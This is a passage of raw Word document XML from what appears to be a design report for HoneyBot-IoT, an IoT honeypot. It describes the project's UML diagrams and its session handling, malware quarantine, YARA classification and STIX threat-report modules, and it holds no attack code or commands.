        <w:t xml:space="preserve">: Activity Diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4273E322" w14:textId="4CDFDFEC" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc229436419"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Class Diagram — Core Domain Model</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="43C374C2" w14:textId="40D58297" w:rsidR="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Class Diagram illustrates the main domain objects of HoneyBot-IoT, attributes, methods, and associations. The design is based on the Object-Oriented decomposition which puts each class under one roof to embody one concept of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C71D650" w14:textId="3C631BDB" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The major associations in the class diagram are: The root aggregate is HoneypotSession, which has one-to-many associations to CredentialAttempt, CommandRecord, and FileCapture. Every HoneypotSession will generate one ThreatEvent after being classified. DeviceEmulator contains many HoneypotSession instances. Both MLClassifier and AnomalyDetector are added as a dependency to the processing pipeline and run on HoneypotSession instances to generate classification data stored in ThreatEvent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F22AC08" w14:textId="77777777" w:rsidR="005C6601" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="095032B7" wp14:editId="3F098ADD">
            <wp:extent cx="4634345" cy="6142866"/>
            <wp:effectExtent l="0" t="0" r="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70975565" name="Picture 1170975565"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4634345" cy="6142866"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Class Diagram for all the architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74AEB8" w14:textId="1E024BB5" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="002D6276" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc229436420"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Swimlane Activity Diagram — AI-Powered Attack Classification (planned, 100%)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="595F82E9" w14:textId="28B9C361" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This models the end-to-end message exchange for the AI-powered attack classification workflow, which is the most complex and performance-critical process in HoneyBot-IoT. This diagram focuses on the interactions among the Protocol Handler, Session Logger, Celery Task Worker, ML Classifier Service, Anomaly Detector Service, Threat Intelligence Engine, and Dashboard WebSocket Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C90F602" w14:textId="77777777" w:rsidR="00F0564A" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="436AA935" wp14:editId="6DEA2467">
            <wp:extent cx="5380419" cy="4069080"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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58079948" name="Picture 1758079948"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5387333" cy="4074309"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">5</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: AI-Powered Attack Classification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BC86B7" w14:textId="2CFD0634" w:rsidR="002D6276" w:rsidRDefault="002D6276" w:rsidP="002D6276">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc229436421"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sequence Diagram of Attacker Session:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="50A80D46" w14:textId="77777777" w:rsidR="002D6276" w:rsidRDefault="002D6276" w:rsidP="002D6276">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="299E6B27" wp14:editId="74E427F5">
            <wp:extent cx="6172200" cy="5215890"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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6172200" cy="5215890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">6</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Sequence Diagram for the Attacker Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF144AF" w14:textId="7B108841" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc229436422"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">State Transition Diagram  HoneypotSession Lifecycle</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="38E4D9D9" w14:textId="77777777" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The State Transition Diagram models the complete state machine for a HoneypotSession object, capturing all valid states and the events that trigger transitions between them. Because HoneyBot-IoT is fundamentally an event-driven system reacting to asynchronous attacker actions, accurate state management is essential to ensure data integrity and correct classification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E8A27E" w14:textId="77777777" w:rsidR="00F0564A" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A836E91" wp14:editId="2F3580ED">
            <wp:extent cx="5022788" cy="5821680"/>
            <wp:effectExtent l="0" t="0" r="6985" b="762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11504320" name="Picture 1011504320"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5030325" cy="5830416"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">7</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Session Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9010" w:name="_Toc69010"/>
      <w:r>
        <w:t xml:space="preserve">Activity Diagram — Implemented Event and Threat-Intelligence Pipeline (60%)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9010"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This activity diagram shows what the implemented code does for every attacker connection (lane A) and in every 30-second pass of the Threat Intelligence Engine (lane B). Lane A is identical for all five protocols because every honeypot uses the same Session and log_event() interface. Lane B reads only the events table, so new protocols are classified without any change to the engine. At 70% the same pass first YARA-scans newly captured samples, and the rule set covers sixteen detection classes (Figures 11 and 14).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Two safety properties are visible in the flow: download URLs are recorded as indicators of compromise but are never fetched, and a failed login is answered with a growing delay instead of an error that would reveal the honeypot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="3867912"/>
            <wp:docPr id="11" name="Picture 11"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="diag_pipeline.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3867912"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">8</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Activity Diagram of the Implemented Event and Threat-Intelligence Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9101" w:name="_Toc9101"/>
      <w:r>
        <w:t xml:space="preserve">4.2 Activity Diagrams of the Implemented Modules (70%)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9101"/>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The models in Section 4.1 describe the complete system of the scope. The activity diagrams below were added in Version 2.1 for the workflows that had no model yet: one diagram for each module workflow implemented at the 70% milestone. Each diagram is drawn from the running code (v0.7), so every action, decision and swimlane corresponds to a function or service that can be demonstrated. Together with Figure 3 (attacker session lifecycle) and Figure 8 (event and threat-intelligence pipeline), every scope module M1–M8 now has an activity model.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9102" w:name="_Toc9102"/>
      <w:r>
        <w:t xml:space="preserve">Activity Diagram — Cross-Protocol Device State Management (M1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9102"/>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This diagram shows how one device command changes the shared state of an emulated device, whatever protocol the attacker uses. The protocol handler authenticates and parses the command; the Device State Manager writes the new value to the device hash in Redis, publishes it on honeybot:state and appends it to the device's change log, so the change is visible on every other protocol. A second, independent flow is the device_state service, which every five seconds simulates sensor readings and camera motion, raises alarms against the attacker-writable thresholds and re-locks the smart lock 60 seconds after an unlock.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4509205" cy="6949440"/>
            <wp:docPr id="12" name="Picture 12"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ad1_device_state.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9001"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4509205" cy="6949440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">9</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Activity Diagram of Cross-Protocol Device State Management (M1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9103" w:name="_Toc9103"/>
      <w:r>
        <w:t xml:space="preserve">Activity Diagram — Multi-Protocol Connection Handling (M2)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9103"/>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every connection, on any of the five protocols, follows the same path after its protocol-specific handshake: a Session is created, each login attempt is checked against the device's weak-credential profile and logged, failures are answered with a growing delay and the device's own error message, and after a successful login every command, request or packet is executed against the emulated device and logged. Malformed input is logged as evidence for the PROTOCOL_EXPLOIT rule instead of stopping the service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5320193" cy="6949440"/>
            <wp:docPr id="13" name="Picture 13"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ad2_protocol_handler.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9002"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5320193" cy="6949440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">10</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Activity Diagram of Multi-Protocol Connection Handling (M2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9104" w:name="_Toc9104"/>
      <w:r>
        <w:t xml:space="preserve">Activity Diagram — Malware Capture and YARA Classification (M3)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9104"/>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Files an attacker delivers over HTTP, SSH (stdin and scp), the fake shell or MQTT are stored once per SHA-256 in a read-only quarantine volume and indexed in file_captures. They are never executed and never served by the API. On its next pass the Threat Intelligence Engine scans every unscanned sample with the IoT YARA rule set; a family match raises a CRITICAL MALWARE_FAMILY detection, and every sample hash becomes an indicator of compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5246065" cy="6949440"/>
            <wp:docPr id="14" name="Picture 14"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ad3_malware_capture.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9003"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5246065" cy="6949440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">11</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Activity Diagram of Malware Capture and YARA Classification (M3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9105" w:name="_Toc9105"/>
      <w:r>
        <w:t xml:space="preserve">Activity Diagram — Threat Report and STIX 2.1 Export (M4)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9105"/>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reports are produced on demand from the Reports &amp; Alerts page, or automatically by the intelligence engine once a day (and weekly on Mondays) when SMTP is configured. The STIX branch builds a bundle of indicators, sightings, ATT&amp;CK attack patterns, malware families and relationships with deterministic identifiers, so a SIEM that imports it twice creates no duplicates. The PDF branch renders the analyst summary, tables and charts. The date of each scheduled report is stored, so a report is attempted at most once per day.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="5210251"/>
            <wp:docPr id="15" name="Picture 15"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ad4_reports_stix.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9004"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="5210251"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">12</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
